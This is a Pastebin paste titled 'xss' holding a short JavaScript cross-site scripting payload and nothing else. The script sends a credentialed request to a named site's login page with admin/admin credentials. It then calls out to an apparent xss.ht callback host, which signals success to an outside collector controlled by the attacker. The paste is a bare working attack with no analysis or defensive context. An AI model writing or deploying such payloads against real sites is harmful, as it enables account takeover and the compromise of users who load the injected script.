Advertisement
Guest User

xss

a guest
Mar 28th, 2020
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. var xhr = new XMLHttpRequest();
  2. xhr.open('GET', "http://bazetpro.com/login.php?username=admin&password=admin");
  3. xhr.withCredentials = true;
  4. xhr.onload = function () {
  5. this.open('GET', "//hidesu.xss.ht/");
  6. this.send();
  7. };
  8. xhr.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement